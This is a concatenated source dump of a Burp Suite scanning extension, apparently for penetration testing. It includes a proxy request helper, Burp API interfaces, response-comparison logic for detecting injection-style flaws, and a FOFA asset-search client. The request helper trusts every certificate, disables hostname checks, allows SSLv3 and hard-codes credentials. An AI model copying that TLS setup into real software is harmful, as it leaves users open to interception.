org.apache.http.client.config.RequestConfig; 9 | import org.apache.http.client.methods.CloseableHttpResponse; 10 | import org.apache.http.client.methods.HttpUriRequest; 11 | import org.apache.http.client.methods.RequestBuilder; 12 | import org.apache.http.conn.ssl.NoopHostnameVerifier; 13 | import org.apache.http.conn.ssl.SSLConnectionSocketFactory; 14 | import org.apache.http.conn.ssl.TrustAllStrategy; 15 | import org.apache.http.conn.ssl.TrustSelfSignedStrategy; 16 | import org.apache.http.entity.ByteArrayEntity; 17 | import org.apache.http.impl.client.BasicCredentialsProvider; 18 | import org.apache.http.impl.client.CloseableHttpClient; 19 | import org.apache.http.impl.client.HttpClients; 20 | import org.apache.http.ssl.SSLContextBuilder; 21 | import org.apache.http.ssl.SSLContexts; 22 | 23 | import javax.net.ssl.SSLContext; 24 | import java.net.*; 25 | import java.util.*; 26 | 27 | public class RequestHelper { 28 | public static void doRequestViaProxy(URL url, String method, List headers, byte[] body, HttpHost proxy, String user, String pass) throws Exception { 29 | String protocol = url.getProtocol(); 30 | Credentials credentials = new UsernamePasswordCredentials(user, pass); 31 | AuthScope authScope = new AuthScope(proxy.getHostName(), proxy.getPort()); 32 | CredentialsProvider credsProvider = new BasicCredentialsProvider(); 33 | credsProvider.setCredentials(authScope, credentials); 34 | 35 | SSLContext sslContext = SSLContexts.custom() 36 | .loadTrustMaterial((chain, authType) -> true).build(); 37 | SSLConnectionSocketFactory sslConnectionSocketFactory = 38 | new SSLConnectionSocketFactory(sslContext, new String[] 39 | {"SSLv3", "TLSv1","TLSv1.1", "TLSv1.2" }, null, 40 | NoopHostnameVerifier.INSTANCE); 41 | 42 | CloseableHttpClient httpClient = HttpClients 43 | .custom() 44 | // .setSSLSocketFactory(new SSLConnectionSocketFactory(SSLContexts.custom() 45 | // .loadTrustMaterial(null, new TrustSelfSignedStrategy()) 46 | // .build() 47 | // ) 48 | // ) 49 | .setSSLSocketFactory(sslConnectionSocketFactory) 50 | // .setSSLContext(new SSLContextBuilder().loadTrustMaterial(null, TrustAllStrategy.INSTANCE).build()) 51 | // .setSSLHostnameVerifier(NoopHostnameVerifier.INSTANCE) 52 | .setProxy(proxy) 53 | .setDefaultCredentialsProvider(credsProvider) 54 | .build(); 55 | RequestBuilder requestBuilder = RequestBuilder.get(); 56 | switch (method.toLowerCase()) { 57 | case "get": 58 | requestBuilder = RequestBuilder.get(); 59 | break; 60 | case "post": 61 | requestBuilder = RequestBuilder.post(); 62 | break; 63 | case "put": 64 | requestBuilder = RequestBuilder.put(); 65 | break; 66 | case "delete": 67 | requestBuilder = RequestBuilder.delete(); 68 | break; 69 | case "patch": 70 | requestBuilder = RequestBuilder.patch(); 71 | break; 72 | case "options": 73 | requestBuilder = RequestBuilder.options(); 74 | break; 75 | case "head": 76 | requestBuilder = RequestBuilder.head(); 77 | break; 78 | } 79 | setHeader(requestBuilder, headers); 80 | if (body.length > 0){ 81 | ByteArrayEntity bodyEntity = new ByteArrayEntity(body); 82 | requestBuilder.setEntity(bodyEntity); 83 | } 84 | RequestConfig requestConfig = RequestConfig.custom().setConnectTimeout(5000).setConnectionRequestTimeout(1000) 85 | .setSocketTimeout(5000).build(); 86 | HttpUriRequest request = requestBuilder 87 | .setUri(url.toURI()) 88 | .setConfig(requestConfig) 89 | .build(); 90 | CloseableHttpResponse response = httpClient.execute(request); 91 | httpClient.close(); 92 | response.close(); 93 | } 94 | 95 | public static void main(String[] args) throws Exception { 96 | URL url = new URL("https://xs3c.co/ip.php"); 97 | ArrayList header = new ArrayList<>(); 98 | header.add("connection: keep-alive"); 99 | header.add("content-type: application/json"); 100 | String body = "{\"username\": \"admin\", \"password\": \"123qwe!@#QWE\"}"; 101 | HttpHost proxy = new HttpHost("192.168.1.219", 833); 102 | // HttpHost proxy = new HttpHost("192.168.124.128", 8081); 103 | String method = "post"; 104 | doRequestViaProxy(url, method, header, body.getBytes(), proxy, "usual", "asdqwe123"); 105 | 106 | } 107 | private static void setHeader(RequestBuilder requestBuilder, List headers) { 108 | headers.forEach((s) -> { 109 | if (s.contains(": ")) { 110 | String[] split = s.split(": "); 111 | requestBuilder.addHeader(split[0], split[1]); 112 | } 113 | }); 114 | } 115 | } 116 | -------------------------------------------------------------------------------- /src/main/java/burp/IContextMenuInvocation.java: -------------------------------------------------------------------------------- 1 | package burp; 2 | 3 | /* 4 | * @(#)IContextMenuInvocation.java 5 | * 6 | * Copyright PortSwigger Ltd. All rights reserved. 7 | * 8 | * This code may be used to extend the functionality of Burp Suite Community Edition 9 | * and Burp Suite Professional, provided that this usage does not violate the 10 | * license terms for those products. 11 | */ 12 | import java.awt.event.InputEvent; 13 | 14 | /** 15 | * This interface is used when Burp calls into an extension-provided 16 | * IContextMenuFactory with details of a context menu invocation. 17 | * The custom context menu factory can query this interface to obtain details of 18 | * the invocation event, in order to determine what menu items should be 19 | * displayed. 20 | */ 21 | public interface IContextMenuInvocation 22 | { 23 | /** 24 | * Used to indicate that the context menu is being invoked in a request 25 | * editor. 26 | */ 27 | byte CONTEXT_MESSAGE_EDITOR_REQUEST = 0; 28 | /** 29 | * Used to indicate that the context menu is being invoked in a response 30 | * editor. 31 | */ 32 | byte CONTEXT_MESSAGE_EDITOR_RESPONSE = 1; 33 | /** 34 | * Used to indicate that the context menu is being invoked in a non-editable 35 | * request viewer. 36 | */ 37 | byte CONTEXT_MESSAGE_VIEWER_REQUEST = 2; 38 | /** 39 | * Used to indicate that the context menu is being invoked in a non-editable 40 | * response viewer. 41 | */ 42 | byte CONTEXT_MESSAGE_VIEWER_RESPONSE = 3; 43 | /** 44 | * Used to indicate that the context menu is being invoked in the Target 45 | * site map tree. 46 | */ 47 | byte CONTEXT_TARGET_SITE_MAP_TREE = 4; 48 | /** 49 | * Used to indicate that the context menu is being invoked in the Target 50 | * site map table. 51 | */ 52 | byte CONTEXT_TARGET_SITE_MAP_TABLE = 5; 53 | /** 54 | * Used to indicate that the context menu is being invoked in the Proxy 55 | * history. 56 | */ 57 | byte CONTEXT_PROXY_HISTORY = 6; 58 | /** 59 | * Used to indicate that the context menu is being invoked in the Scanner 60 | * results. 61 | */ 62 | byte CONTEXT_SCANNER_RESULTS = 7; 63 | /** 64 | * Used to indicate that the context menu is being invoked in the Intruder 65 | * payload positions editor. 66 | */ 67 | byte CONTEXT_INTRUDER_PAYLOAD_POSITIONS = 8; 68 | /** 69 | * Used to indicate that the context menu is being invoked in an Intruder 70 | * attack results. 71 | */ 72 | byte CONTEXT_INTRUDER_ATTACK_RESULTS = 9; 73 | /** 74 | * Used to indicate that the context menu is being invoked in a search 75 | * results window. 76 | */ 77 | byte CONTEXT_SEARCH_RESULTS = 10; 78 | 79 | /** 80 | * This method can be used to retrieve the native Java input event that was 81 | * the trigger for the context menu invocation. 82 | * 83 | * @return The InputEvent that was the trigger for the context 84 | * menu invocation. 85 | */ 86 | InputEvent getInputEvent(); 87 | 88 | /** 89 | * This method can be used to retrieve the Burp tool within which the 90 | * context menu was invoked. 91 | * 92 | * @return A flag indicating the Burp tool within which the context menu was 93 | * invoked. Burp tool flags are defined in the 94 | * IBurpExtenderCallbacks interface. 95 | */ 96 | int getToolFlag(); 97 | 98 | /** 99 | * This method can be used to retrieve the context within which the menu was 100 | * invoked. 101 | * 102 | * @return An index indicating the context within which the menu was 103 | * invoked. The indices used are defined within this interface. 104 | */ 105 | byte getInvocationContext(); 106 | 107 | /** 108 | * This method can be used to retrieve the bounds of the user's selection 109 | * into the current message, if applicable. 110 | * 111 | * @return An int[2] array containing the start and end offsets of the 112 | * user's selection in the current message. If the user has not made any 113 | * selection in the current message, both offsets indicate the position of 114 | * the caret within the editor. If the menu is not being invoked from a 115 | * message editor, the method returns null. 116 | */ 117 | int[] getSelectionBounds(); 118 | 119 | /** 120 | * This method can be used to retrieve details of the HTTP requests / 121 | * responses that were shown or selected by the user when the context menu 122 | * was invoked. 123 | * 124 | * Note: For performance reasons, the objects returned from this 125 | * method are tied to the originating context of the messages within the 126 | * Burp UI. For example, if a context menu is invoked on the Proxy intercept 127 | * panel, then the 128 | * IHttpRequestResponse returned by this method will reflect 129 | * the current contents of the interception panel, and this will change when 130 | * the current message has been forwarded or dropped. If your extension 131 | * needs to store details of the message for which the context menu has been 132 | * invoked, then you should query those details from the 133 | * IHttpRequestResponse at the time of invocation, or you 134 | * should use 135 | * IBurpExtenderCallbacks.saveBuffersToTempFiles() to create a 136 | * persistent read-only copy of the 137 | * IHttpRequestResponse. 138 | * 139 | * @return An array of IHttpRequestResponse objects 140 | * representing the items that were shown or selected by the user when the 141 | * context menu was invoked. This method returns null if no 142 | * messages are applicable to the invocation. 143 | */ 144 | IHttpRequestResponse[] getSelectedMessages(); 145 | 146 | /** 147 | * This method can be used to retrieve details of the Scanner issues that 148 | * were selected by the user when the context menu was invoked. 149 | * 150 | * @return An array of IScanIssue objects representing the 151 | * issues that were selected by the user when the context menu was invoked. 152 | * This method returns null if no Scanner issues are applicable 153 | * to the invocation. 154 | */ 155 | IScanIssue[] getSelectedIssues(); 156 | } 157 | -------------------------------------------------------------------------------- /src/main/java/burp/IScannerInsertionPoint.java: -------------------------------------------------------------------------------- 1 | package burp; 2 | 3 | /* 4 | * @(#)IScannerInsertionPoint.java 5 | * 6 | * Copyright PortSwigger Ltd. All rights reserved. 7 | * 8 | * This code may be used to extend the functionality of Burp Suite Community Edition 9 | * and Burp Suite Professional, provided that this usage does not violate the 10 | * license terms for those products. 11 | */ 12 | /** 13 | * This interface is used to define an insertion point for use by active Scanner 14 | * checks. Extensions can obtain instances of this interface by registering an 15 | * IScannerCheck, or can create instances for use by Burp's own 16 | * scan checks by registering an 17 | * IScannerInsertionPointProvider. 18 | */ 19 | public interface IScannerInsertionPoint 20 | { 21 | 22 | /** 23 | * Used to indicate where the payload is inserted into the value of a URL 24 | * parameter. 25 | */ 26 | byte INS_PARAM_URL = 0x00; 27 | /** 28 | * Used to indicate where the payload is inserted into the value of a body 29 | * parameter. 30 | */ 31 | byte INS_PARAM_BODY = 0x01; 32 | /** 33 | * Used to indicate where the payload is inserted into the value of an HTTP 34 | * cookie. 35 | */ 36 | byte INS_PARAM_COOKIE = 0x02; 37 | /** 38 | * Used to indicate where the payload is inserted into the value of an item 39 | * of data within an XML data structure. 40 | */ 41 | byte INS_PARAM_XML = 0x03; 42 | /** 43 | * Used to indicate where the payload is inserted into the value of a tag 44 | * attribute within an XML structure. 45 | */ 46 | byte INS_PARAM_XML_ATTR = 0x04; 47 | /** 48 | * Used to indicate where the payload is inserted into the value of a 49 | * parameter attribute within a multi-part message body (such as the name of 50 | * an uploaded file). 51 | */ 52 | byte INS_PARAM_MULTIPART_ATTR = 0x05; 53 | /** 54 | * Used to indicate where the payload is inserted into the value of an item 55 | * of data within a JSON structure. 56 | */ 57 | byte INS_PARAM_JSON = 0x06; 58 | /** 59 | * Used to indicate where the payload is inserted into the value of an AMF 60 | * parameter. 61 | */ 62 | byte INS_PARAM_AMF = 0x07; 63 | /** 64 | * Used to indicate where the payload is inserted into the value of an HTTP 65 | * request header. 66 | */ 67 | byte INS_HEADER = 0x20; 68 | /** 69 | * Used to indicate where the payload is inserted into a URL path folder. 70 | */ 71 | byte INS_URL_PATH_FOLDER = 0x21; 72 | /** 73 | * Used to indicate where the payload is inserted into a URL path folder. 74 | * This is now deprecated; use INS_URL_PATH_FOLDER instead. 75 | */ 76 | @Deprecated 77 | byte INS_URL_PATH_REST = INS_URL_PATH_FOLDER; 78 | /** 79 | * Used to indicate where the payload is inserted into the name of an added 80 | * URL parameter. 81 | */ 82 | byte INS_PARAM_NAME_URL = 0x22; 83 | /** 84 | * Used to indicate where the payload is inserted into the name of an added 85 | * body parameter. 86 | */ 87 | byte INS_PARAM_NAME_BODY = 0x23; 88 | /** 89 | * Used to indicate where the payload is inserted into the body of the HTTP 90 | * request. 91 | */ 92 | byte INS_ENTIRE_BODY = 0x24; 93 | /** 94 | * Used to indicate where the payload is inserted into the URL path 95 | * filename. 96 | */ 97 | byte INS_URL_PATH_FILENAME = 0x25; 98 | /** 99 | * Used to indicate where the payload is inserted at a location manually 100 | * configured by the user. 101 | */ 102 | byte INS_USER_PROVIDED = 0x40; 103 | /** 104 | * Used to indicate where the insertion point is provided by an 105 | * extension-registered 106 | * IScannerInsertionPointProvider. 107 | */ 108 | byte INS_EXTENSION_PROVIDED = 0x41; 109 | /** 110 | * Used to indicate where the payload is inserted at an unknown location 111 | * within the request. 112 | */ 113 | byte INS_UNKNOWN = 0x7f; 114 | 115 | /** 116 | * This method returns the name of the insertion point. 117 | * 118 | * @return The name of the insertion point (for example, a description of a 119 | * particular request parameter). 120 | */ 121 | String getInsertionPointName(); 122 | 123 | /** 124 | * This method returns the base value for this insertion point. 125 | * 126 | * @return the base value that appears in this insertion point in the base 127 | * request being scanned, or null if there is no value in the 128 | * base request that corresponds to this insertion point. 129 | */ 130 | String getBaseValue(); 131 | 132 | /** 133 | * This method is used to build a request with the specified payload placed 134 | * into the insertion point. There is no requirement for extension-provided 135 | * insertion points to adjust the Content-Length header in requests if the 136 | * body length has changed, although Burp-provided insertion points will 137 | * always do this and will return a request with a valid Content-Length 138 | * header. 139 | * Note: 140 | * Scan checks should submit raw non-encoded payloads to insertion points, 141 | * and the insertion point has responsibility for performing any data 142 | * encoding that is necessary given the nature and location of the insertion 143 | * point. 144 | * 145 | * @param payload The payload that should be placed into the insertion 146 | * point. 147 | * @return The resulting request. 148 | */ 149 | byte[] buildRequest(byte[] payload); 150 | 151 | /** 152 | * This method is used to determine the offsets of the payload value within 153 | * the request, when it is placed into the insertion point. Scan checks may 154 | * invoke this method when reporting issues, so as to highlight the relevant 155 | * part of the request within the UI. 156 | * 157 | * @param payload The payload that should be placed into the insertion 158 | * point. 159 | * @return An int[2] array containing the start and end offsets of the 160 | * payload within the request, or null if this is not applicable (for 161 | * example, where the insertion point places a payload into a serialized 162 | * data structure, the raw payload may not literally appear anywhere within 163 | * the resulting request). 164 | */ 165 | int[] getPayloadOffsets(byte[] payload); 166 | 167 | /** 168 | * This method returns the type of the insertion point. 169 | * 170 | * @return The type of the insertion point. Available types are defined in 171 | * this interface. 172 | */ 173 | byte getInsertionPointType(); 174 | } 175 | -------------------------------------------------------------------------------- /src/main/java/BrianW/AKA/BigChan/PowerScanner/Reporter.java: -------------------------------------------------------------------------------- 1 | package BrianW.AKA.BigChan.PowerScanner; 2 | 3 | import BrianW.AKA.BigChan.Tools.CustomScanIssue; 4 | import BrianW.AKA.BigChan.Tools.HitRst; 5 | import BrianW.AKA.BigChan.Tools.Utils; 6 | import burp.*; 7 | 8 | import java.net.URL; 9 | import java.util.Arrays; 10 | 11 | public class Reporter { 12 | private final IBurpExtenderCallbacks callbacks; 13 | private final IExtensionHelpers helpers; 14 | public Reporter(IBurpExtenderCallbacks callbacks, IExtensionHelpers helpers) { 15 | this.callbacks = callbacks; 16 | this.helpers = helpers; 17 | } 18 | CustomScanIssue reporter(String title, String desc, String sev, String confidence, IHttpRequestResponse... Pairs) { 19 | IHttpService service = Pairs[0].getHttpService(); 20 | URL url = helpers.analyzeRequest(Pairs[0]).getUrl(); 21 | title = "[PowerScanner]: " + title; 22 | // IHttpRequestResponse[] finalPair = new IHttpRequestResponse[]{ 23 | // basePair, 24 | // Pairs 25 | // }; 26 | return new CustomScanIssue( 27 | service, 28 | url, 29 | Pairs, 30 | title, 31 | desc, 32 | sev, 33 | confidence); 34 | } 35 | HitRst hit(byte[] respBase, byte[] respPositive, byte[] respNegative, String positiveStr, String negativeStr) { 36 | int resp_statusCode = helpers.analyzeResponse(respBase).getStatusCode(); 37 | int respTrue_statusCode = helpers.analyzeResponse(respPositive).getStatusCode(); 38 | int respEvil_statusCode = helpers.analyzeResponse(respNegative).getStatusCode(); 39 | IResponseVariations ResponseVariationsPositive = helpers.analyzeResponseVariations(respBase, respPositive); 40 | IResponseVariations ResponseVariationsNegative = helpers.analyzeResponseVariations(respBase, respNegative); 41 | StringBuilder compareWithNegative_Diff = new StringBuilder(); 42 | StringBuilder compareWithNegative_Same = new StringBuilder(); 43 | StringBuilder compareWithPositive_Diff = new StringBuilder(); 44 | StringBuilder compareWithPositive_Same = new StringBuilder(); 45 | for (String VariantAttribute : ResponseVariationsNegative.getVariantAttributes()) { 46 | compareWithNegative_Diff.append(String.format("%s : %s vs %s
", 47 | VariantAttribute, 48 | ResponseVariationsNegative.getAttributeValue(VariantAttribute, 0), 49 | ResponseVariationsNegative.getAttributeValue(VariantAttribute, 1) 50 | )); 51 | } 52 | for (String InvariantAttribute : ResponseVariationsNegative.getInvariantAttributes()) { 53 | compareWithNegative_Same.append(String.format("%s : %s vs %s
", 54 | InvariantAttribute, 55 | ResponseVariationsNegative.getAttributeValue(InvariantAttribute, 0), 56 | ResponseVariationsNegative.getAttributeValue(InvariantAttribute, 1) 57 | )); 58 | } 59 | for (String VariantAttribute : ResponseVariationsPositive.getVariantAttributes()) { 60 | compareWithPositive_Diff.append(String.format("%s : %s vs %s
", 61 | VariantAttribute, 62 | ResponseVariationsPositive.getAttributeValue(VariantAttribute, 0), 63 | ResponseVariationsPositive.getAttributeValue(VariantAttribute, 1) 64 | )); 65 | } 66 | for (String InvariantAttribute : ResponseVariationsPositive.getInvariantAttributes()) { 67 | compareWithPositive_Same.append(String.format("%s : %s vs %s
", 68 | InvariantAttribute, 69 | ResponseVariationsPositive.getAttributeValue(InvariantAttribute, 0), 70 | ResponseVariationsPositive.getAttributeValue(InvariantAttribute, 1) 71 | )); 72 | } 73 | if (resp_statusCode == respTrue_statusCode && resp_statusCode != respEvil_statusCode) { 74 | return new HitRst(1, compareWithNegative_Diff.toString(), compareWithNegative_Same.toString(), compareWithPositive_Diff.toString(), compareWithPositive_Same.toString()); 75 | } 76 | int resp_ErrorCount = Utils.countStr(Arrays.toString(respBase), "error"); 77 | int respTrue_ErrorCount = Utils.countStr(Arrays.toString(respPositive), "error"); 78 | int respEvil_ErrorCount = Utils.countStr(Arrays.toString(respNegative), "error"); 79 | if (resp_ErrorCount == respTrue_ErrorCount && respTrue_ErrorCount != respEvil_ErrorCount) { 80 | return new HitRst(2, compareWithNegative_Diff.toString(), compareWithNegative_Same.toString(), compareWithPositive_Diff.toString(), compareWithPositive_Same.toString()); 81 | } 82 | //如果原始包visible_text和visible_word_count都是0,基本可以断定是验证码类型 83 | if (ResponseVariationsPositive.getAttributeValue("visible_text", 0) == 0 && ResponseVariationsPositive.getAttributeValue("visible_word_count", 0) == 0) { 84 | return new HitRst(0, compareWithNegative_Diff.toString(), compareWithNegative_Same.toString(), compareWithPositive_Diff.toString(), compareWithPositive_Same.toString()); 85 | } 86 | //去除payload后,如果positive返回和negative返回一样,无漏洞 87 | String respTrue_pure = Arrays.toString(respPositive).replace(positiveStr, "").replace(negativeStr, ""); 88 | String respEvil_pure = Arrays.toString(respNegative).replace(negativeStr, "").replace(positiveStr, ""); 89 | if (respTrue_pure.equals(respEvil_pure)) { 90 | return new HitRst(0, compareWithNegative_Diff.toString(), compareWithNegative_Same.toString(), compareWithPositive_Diff.toString(), compareWithPositive_Same.toString()); 91 | } 92 | 93 | //如果positive包和原始包不一样,无漏洞 94 | if (ResponseVariationsPositive.getVariantAttributes().contains("initial_body_content") || 95 | ResponseVariationsPositive.getVariantAttributes().contains("content_type") 96 | ) { 97 | return new HitRst(0, compareWithNegative_Diff.toString(), compareWithNegative_Same.toString(), compareWithPositive_Diff.toString(), compareWithPositive_Same.toString()); 98 | } 99 | //如果Negative包和原始包一样,无漏洞 100 | if (ResponseVariationsNegative.getInvariantAttributes().contains("whole_body_content") 101 | || ResponseVariationsNegative.getInvariantAttributes().contains("content_length") 102 | ) { 103 | return new HitRst(0, compareWithNegative_Diff.toString(), compareWithNegative_Same.toString(), compareWithPositive_Diff.toString(), compareWithPositive_Same.toString()); 104 | } 105 | //如果Negative包和原始包字符数差==positive包和原始包字符数差,无漏洞 106 | int positiveLength = ResponseVariationsPositive.getAttributeValue("content_length", 1); 107 | int negativeLength = ResponseVariationsNegative.getAttributeValue("content_length", 1); 108 | int baseLength = ResponseVariationsNegative.getAttributeValue("content_length", 0); 109 | 110 | int length1 = positiveLength - baseLength; 111 | int length2 = negativeLength - baseLength; 112 | if (length1 / positiveStr.length() == length2 / negativeStr.length()) { 113 | return new HitRst(0, compareWithNegative_Diff.toString(), compareWithNegative_Same.toString(), compareWithPositive_Diff.toString(), compareWithPositive_Same.toString()); 114 | } 115 | //如果Negative包比positive包多一个字符,无漏洞 116 | if (positiveLength - negativeLength == positiveStr.length() - negativeStr.length()) { 117 | return new HitRst(0, compareWithNegative_Diff.toString(), compareWithNegative_Same.toString(), compareWithPositive_Diff.toString(), compareWithPositive_Same.toString()); 118 | } 119 | 120 | if (ResponseVariationsPositive.getInvariantAttributes() != ResponseVariationsNegative.getInvariantAttributes() 121 | && 122 | ResponseVariationsPositive.getAttributeValue("content_length", 1) != ResponseVariationsNegative.getAttributeValue("content_length", 1) 123 | ) { 124 | return new HitRst(3, compareWithNegative_Diff.toString(), compareWithNegative_Same.toString(), compareWithPositive_Diff.toString(), compareWithPositive_Same.toString()); 125 | } 126 | return new HitRst(0, compareWithNegative_Diff.toString(), compareWithNegative_Same.toString(), compareWithPositive_Diff.toString(), compareWithPositive_Same.toString()); 127 | } 128 | 129 | } 130 | -------------------------------------------------------------------------------- /src/main/java/com/r4v3zn/fofa/core/client/FofaClient.java: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 2019. r4v3zn. 3 | * Licensed under the Apache License, Version 2.0 (the "License"); 4 | * you may not use this file except in compliance with the License. 5 | * You may obtain a copy of the License at 6 | * 7 | * http://www.apache.org/licenses/LICENSE-2.0 8 | * 9 | * Unless required by applicable law or agreed to in writing, software 10 | * distributed under the License is distributed on an "AS IS" BASIS, 11 | * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 12 | * See the License for the specific language governing permissions and 13 | * limitations under the License. 14 | */ 15 | 16 | package com.r4v3zn.fofa.core.client; 17 | 18 | import com.fasterxml.jackson.databind.JsonNode; 19 | import com.fasterxml.jackson.databind.ObjectMapper; 20 | import com.r4v3zn.fofa.core.DO.FofaData; 21 | import com.r4v3zn.fofa.core.DO.User; 22 | import com.r4v3zn.fofa.core.DO.UserLogin; 23 | import com.r4v3zn.fofa.core.enmus.UserVipLevelEnum; 24 | import com.r4v3zn.fofa.core.exception.FofaException; 25 | import com.r4v3zn.fofa.core.util.HttpUtils; 26 | import java.util.*; 27 | import static com.r4v3zn.fofa.core.constants.FofaClientConsts.*; 28 | import static com.r4v3zn.fofa.core.constants.FofaFieldsConsts.FIELDS_LIST; 29 | import static com.r4v3zn.fofa.core.util.Base64Utils.encode; 30 | 31 | /** 32 | * Title: FofaClient 33 | * Descrption: this is FOFA Pro client 34 | * Date:2019-06-07 14:21 35 | * Email:woo0nise@gmail.com 36 | * Company:www.j2ee.app 37 | * @author R4v3zn 38 | * @version 1.0.0 39 | */ 40 | public class FofaClient { 41 | 42 | private String email; 43 | 44 | private String key; 45 | 46 | /** 47 | * Constructor 48 | * @param email email 49 | * @param key key 50 | */ 51 | public FofaClient(String email, String key){ 52 | this.email = email; 53 | this.key = key; 54 | } 55 | 56 | /** 57 | * Jackson mapper 58 | */ 59 | private ObjectMapper mapper = new ObjectMapper(); 60 | 61 | /** 62 | * getUserLogin 63 | * @return 64 | */ 65 | public UserLogin getUserLogin(){ 66 | return new UserLogin(email, key); 67 | } 68 | 69 | /** 70 | * get user info 71 | * @return 72 | */ 73 | public User getUser() throws Exception{ 74 | String loginEmail = this.email; 75 | String loginKey = this.key; 76 | // get user 77 | String url = BASE_URL + GET_USER_INFO_URI; 78 | Map map = new HashMap(); 79 | map.put("email", loginEmail); 80 | map.put("key", loginKey); 81 | String rsp = HttpUtils.doGet(url, map); 82 | JsonNode node = mapper.readTree(rsp); 83 | JsonNode errorNode = node.get("error"); 84 | if(errorNode != null && errorNode.asBoolean()){ 85 | throw new FofaException(node.get("errmsg").asText()); 86 | } 87 | String email = node.get("email").asText(); 88 | String userName = node.get("username").asText(); 89 | Integer fCoin = node.get("fcoin").asInt(); 90 | Boolean isVip = node.get("isvip").asBoolean(); 91 | Integer vipLevel = node.get("vip_level").asInt(); 92 | Boolean isVerified = node.get("is_verified").asBoolean(); 93 | String avatar = node.get("avatar").asText(); 94 | Integer message = node.get("message").asInt(); 95 | String fofacliVersion = node.get("fofacli_ver").asText(); 96 | Boolean fofaServer = node.get("fofacli_ver").asBoolean(); 97 | UserVipLevelEnum vipLevelEnum = vipLevel == 1?UserVipLevelEnum.VIP:UserVipLevelEnum.SVIP; 98 | User user = new User(email,userName,fCoin,isVip,vipLevelEnum,isVerified,avatar,message,fofacliVersion, fofaServer); 99 | return user; 100 | } 101 | 102 | /** 103 | * get data 104 | *

105 | * page default 1 106 | * size default 100 107 | * fields default host 108 | * full default false 109 | *

110 | * @param q search query(not encode) 111 | * @return fofa search result data 112 | * @throws Exception search Expection 113 | */ 114 | public FofaData getData(String q) throws Exception { 115 | return getData(q, 1,100,"host",false); 116 | } 117 | 118 | /** 119 | * get data 120 | *

121 | * size default 100 122 | * fields default host 123 | * full default false 124 | *

125 | * @param q search query(not encode) 126 | * @param page page 127 | * @return fofa search result data 128 | * @exception Exception search Expection 129 | */ 130 | public FofaData getData(String q,Integer page) throws Exception { 131 | return getData(q, page,100,"host",false); 132 | } 133 | 134 | /** 135 | * get data 136 | *

137 | * fields default host 138 | * full default false 139 | *

140 | * @param q search query(not encode) 141 | * @param page page 142 | * @param size page size 143 | * @return fofa search result data 144 | * @exception Exception search Expection 145 | */ 146 | public FofaData getData(String q,Integer page,Integer size) throws Exception{ 147 | return getData(q, page,size,"host",false); 148 | } 149 | 150 | /** 151 | * get data 152 | *

153 | * full default false 154 | *

155 | * @param q search query(not encode) 156 | * @param page page 157 | * @param size page size 158 | * @param fields fields 159 | * @return fofa search result data 160 | * @throws Exception search Expection 161 | */ 162 | public FofaData getData(String q,Integer page,Integer size,String fields)throws Exception{ 163 | return getData(q,page,size,fields,false); 164 | } 165 | 166 | /** 167 | * get data 168 | * @param q search query(not encode) 169 | * @param page page no 170 | * @param size page size 171 | * @param fields fields 172 | * @param full is full 173 | * @return fofa search result data 174 | */ 175 | public FofaData getData(String q, Integer page, Integer size, String fields, Boolean full) throws Exception{ 176 | checkParam(q,size,fields); 177 | // check page 178 | page = page < 0 ? 1:page; 179 | // check full is not null 180 | full = full == null ? false:full; 181 | String url = BASE_URL+SEARCH_URI; 182 | Map map = new HashMap(); 183 | map.put("qbase64",encode(q)); 184 | map.put("page", page); 185 | map.put("size", size); 186 | map.put("fields", fields); 187 | map.put("full",full); 188 | map.put("key", key); 189 | map.put("email", email); 190 | String rsp = HttpUtils.doGet(url, map); 191 | JsonNode node = mapper.readTree(rsp); 192 | JsonNode errorNode = node.get("error"); 193 | if(errorNode != null && errorNode.asBoolean()){ 194 | throw new FofaException(node.get("errmsg").asText()); 195 | } 196 | String mode = node.get("mode").asText(); 197 | String query = node.get("query").asText(); 198 | Integer rspPage = node.get("page").asInt(); 199 | Integer totalSize = node.get("size").asInt(); 200 | String results = node.get("results").toString(); 201 | Integer totalPage = totalSize%size == 0 ? totalSize/size:totalSize/size + 1; 202 | FofaData fofaData = new FofaData(); 203 | fofaData.setMode(mode); 204 | fofaData.setPage(rspPage); 205 | fofaData.setSize(totalSize); 206 | fofaData.setQuery(query); 207 | fofaData.setTotalPage(totalPage); 208 | List> list = mapper.readValue(results, List.class); 209 | fofaData.setResults(list); 210 | return fofaData; 211 | } 212 | 213 | /** 214 | * check param 215 | * @param q search query 216 | * @param size size 217 | * @param fields fields 218 | * @throws FofaException 219 | */ 220 | public void checkParam(String q,Integer size, String fields)throws FofaException{ 221 | // check search query 222 | if(q == null || "".equals(q)){ 223 | throw new FofaException("search query cannot be empty"); 224 | } 225 | // check max size 226 | if(size > MAX_SIZE){ 227 | throw new FofaException("max size "+MAX_SIZE); 228 | } 229 | // check fields 230 | List splitList = Arrays.asList(fields.split(",")); 231 | splitList = new ArrayList(splitList); 232 | splitList.removeAll(FIELDS_LIST); 233 | if(splitList.size() > 0){ 234 | throw new FofaException(splitList+" not's fields,please delte that"); 235 | } 236 | } 237 | } -------------------------------------------------------------------------------- /src/main/java/BrianW/AKA/BigChan/PowerScanner/GetFofaInfo.java: -------------------------------------------------------------------------------- 1 | package BrianW.AKA.BigChan.PowerScanner; 2 | 3 | import BrianW.AKA.BigChan.Tools.Global; 4 | import BrianW.AKA.BigChan.Tools.DomainTool; 5 | import BrianW.AKA.BigChan.Tools.Utils; 6 | import burp.*; 7 | import com.r4v3zn.fofa.core.DO.FofaData; 8 | import com.r4v3zn.fofa.core.client.FofaClient; 9 | 10 | import java.net.MalformedURLException; 11 | import java.net.URL; 12 | import java.util.ArrayList; 13 | import java.util.Arrays; 14 | import java.util.List; 15 | 16 | public class GetFofaInfo extends Reporter { 17 | protected IBurpExtenderCallbacks callbacks; 18 | protected IExtensionHelpers helpers; 19 | private IBurpCollaboratorClientContext collaboratorContext; 20 | 21 | public GetFofaInfo(IBurpExtenderCallbacks callbacks, IExtensionHelpers helpers) { 22 | super(callbacks, helpers); 23 | this.callbacks = callbacks; 24 | this.helpers = helpers; 25 | collaboratorContext = callbacks.createBurpCollaboratorClientContext(); 26 | } 27 | 28 | public List doGetFofaInfo_Icon(IHttpRequestResponse baseRequestResponse, IScannerInsertionPoint insertionPoint) { 29 | List issues = new ArrayList<>(); 30 | IHttpRequestResponse pairNegative = fetchURL(baseRequestResponse, "/" + Utils.getRandomString(10)); 31 | String email = Global.config.getConfigFofa_Email_value(); 32 | String key = Global.config.getConfigFofa_ApiKey_value(); 33 | FofaClient client = new FofaClient(email, key); 